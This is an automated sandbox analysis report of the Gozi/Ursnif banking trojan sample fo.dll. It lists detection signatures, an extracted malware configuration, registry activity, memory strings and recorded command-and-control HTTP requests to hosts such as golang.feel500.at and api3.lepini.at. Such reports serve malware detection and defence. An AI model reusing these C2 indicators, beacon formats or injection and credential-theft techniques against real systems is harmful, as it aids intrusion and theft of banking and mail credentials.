Analysis Report fo.dll

Overview

General Information

Sample Name:	fo.dll
Analysis ID:	334007
MD5:	b72c009b01b9321cbcb327cf285ccef7
SHA1:	8599a832cdc973e8949a631c349980c0f41ffc48
SHA256:	edf82bc9c74787acbae4fc2a22aa35646616d23b781d6a75a7799a25431398c6
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a COM Internet Explorer object

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: loaddll32.exe.6736.0.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "134", "system": "9c06dc0837d13fc92eb590af08acbac4hhE", "size": "201283", "crc": "2", "action": "00000000", "id": "3300", "time": "1608869150", "user": "f73be0088695dc15e71ab15c41fb0bc7", "hash": "0x0acc6525", "soft": "3"}

Multi AV Scanner detection for submitted file

Source: fo.dll

Virustotal: Detection: 22%

Perma Link

Machine Learning detection for sample

Source: fo.dll

Joe Sandbox ML: detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03144FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_03144FE1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_0313888D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_0312E0BA

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_031305EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

0_2_031305EF

Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: global traffic	HTTP traffic detected: GET /api1/JqcXh8pdjCRNE_2Bo/k4G_2BpM24Ua/kAoQCjr_2Bh/ujHmQfZGFu_2F2/nA1tAcoG0UwmK9lArxe1S/414MI2ZuaHyc3Hql/pDoGm3pbqcfZ6eH/rIV_2B_2BIwZsV3ugj/LFW12XoXB/5IhYMecPu_2FZ3MO7ToD/UbND3bAbyICPq0DkfXa/IBZ9XP6woLvZlIKyAfQqqI/Uiw5lx_2FvlxN/HMlCb4bo/g8XoEKflv1sBuQnXNE8yNcw/AKDCMRNxF4/MMEe64x10s46GwvXs/NfWSVoItfJCu/ETw0UJmfuPx/MFmlVBYs8cT1cy/upat0gwv0SID/c HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/MC0KUFyM/atN4YRJ4eGaVNgoEiHKk1sV/uZXY8dNFOC/5muSX5_2FgYBcb3Z0/Hw8SCE4gdadK/LoRPjWZ1kN2/o8CoNlrTCVbhEo/361jZbmCNrUZVIP5Bhl57/JqyEcDfYivA3dm0O/mky8dRn0ggErrbj/akiw2jijXQRCdNJW8y/iVMNh7InN/9CHIQJtXSEecSzTxafOp/CndbtrwZnb3pGjztd1x/sNuKRnkS3EeHF4W3Svpatj/SuzQoCnLkNFM_/2F9afglr/8gsSDsY68lq9DByv2oLPokh/wgO8nuXPE5/2ZEgLGQD8YpRYIz5b/FeDsfcnAti/dh68UKBF HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2/FCqi0ui4EgRuQKNmSc2/LHtuPWymhOYZR_2FJDHmxn/_2FrEGE1ZbjAn/1oshEbf_/2FLREWh1LoDUsvxxAvs7QD5/dvnwj8fGqM/x9Cj0InfA93JERgMb/jvGKQ1lz4X9T/7v88BZtQprh/toDQVprzBnQqX7/PNo9bxVHknk7UTjGk71xL/qaOfpUOtZr60DaIJ/Z_2BfcJhSJDle0W/SRI_2FrQNsALZHaCkM/LU1KC3iGK/DvkQcZrlaQKckhwbDOmn/rYJqFe6wJntn8_2FTVZ/m40BS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/LORfTl2pETMFVU7/wmWsrPQkTKd_2FnRRq/YFsoOxoi6/ZKKr_2BSzTM1ZV_2BmG8/QLf1_2BrD7d9qUhAxps/CGbKC7bT1amoQI1HYUX8R7/wm75uPSfo_2B2/_2FsJFS6/_2BNeXTDBj_2BtQXfJjgc3I/HnVW2zL6rr/joxJeMAoMMP9c2fI0/tMrDLqA_2FiO/Fpvbtyr_2B1/MuEXGCiN9n5YUz/PA_2F9ti0coaJgd_2BIiz/xE1X7ankHr3ko40c/dbREH_2BlZg_2F_/2FFd2SKEDVXMlYpxRv/xrEPDyAVN/y0vUiofeSrtYGhvW4XLQ/LX_2FjAdqFE0fVpb5Hc/94ExhbjQdDmIQdq_2F2tMR/azR HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/ge76nNd2r9i7q/f4m7qnru/ODJiitx5KnO_2FlTKPLiqHN/iN3_2FwnGS/cMz53x6_2BNTJzFKu/GvXWghhznGvj/xuyrdDzhJ8U/ipLoAih5yQdyhW/jYxcE7DfgVGYeA0ymDNSv/2cXxlL4sP4_2B7dE/KscxdpWWxM653_2/B_2Fz0kRfaWcJF5wq8/85RpQlZKe/V8jy_2BSqfOrqvaSuZRQ/jK1M36Z4E2lD5gJWX4u/PXlLACwNTib8qbZUXKDq1s/5q3wJc33iTaAL/UKszY336/PyF_2B_2Fxuh9RQFy7nHHpu/xcXSzckdW9/8jC6GzIl/MxkKpsQ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/ZlBWB39wHAVH3v/raQmqMGJOifuhaYaKNwxh/IZ_2F6KBArqyCY8b/WbnoycUqXeSUGG9/rcgEljM3y6DLL_2BQV/3c03FGZDQ/pExrtqt50dAd2zPnzL3m/bLVeszfj3J1PKvuTYR5/m2X2vt_2FBD8yHfErKPH45/2RSHFXzCtabu7/yWSpuChs/EzLl2UBJPJU_2BdHaDjN7Dw/524FGLWh_2/BjCBxT8fanf_2FJBl/OiuE4QhSNb2G/hMldz29diPw/4FF40uXsQWZKGL/IAMRrIyJs6o_2BVOaFkq9/SCNXTFsH5uVIx_2F/49xRCH3m7bermao/j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: FIND US: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp	String found in binary or memory: WATCH US: www.youtube.com/g5enter equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: golang.feel500.at

Source: unknown

HTTP traffic detected: POST /api1/GC1ocAtBhowKLdLbTST8/6YRfIHrc1z8aNndqDwy/Rj4cR0tkeWtB5SXs0_2FDA/G_2Bzob9KrYk1/ee238C3Z/JDlyapWA93gE3_2Bp1jTydd/8GEbA8iZ06/e4a5NG_2FcTR_2FK1/ZUyu2uSSJ9F9/DomsqAwIwqE/YoT6M9Yf8a3aZq/kF6U6bm3L2d8juuElHvFK/nLA9fg_2BF9F7d1o/_2FXLVqgOXpmlhi/xiQPBRQ00LlJWSjfVm/ktN1zwUZ8/1L3Jodx29tHs_2FY7FjX/MxbpxkWX3VN69cbK6kU/aqmaWa1G2QstKbyN7jrfLu/a1Wmfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Dec 2020 19:05:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000003.388260705.0000027DF6B1B000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.377460662.000000000F6C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: {76F37E5B-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr	String found in binary or memory: http://golang.feel500.at/api1/JqcXh8pdjCRNE_2Bo/k4G_2BpM24Ua/kAoQCjr_2Bh/ujHmQfZGFu_2F2/nA1tAcoG0Uwm
Source: {76F37E5D-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr, ~DFEC113D747FBB8244.TMP.10.dr	String found in binary or memory: http://golang.feel500.at/api1/MC0KUFyM/atN4YRJ4eGaVNgoEiHKk1sV/uZXY8dNFOC/5muSX5_2FgYBcb3Z0/Hw8SCE4g
Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmp	String found in binary or memory: http://golang.feel500.at/api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2
Source: {76F37E5F-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr, ~DFCE9772CEB2FA999E.TMP.10.dr	String found in binary or memory: http://golang.feel500.at/api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2/FCqi
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
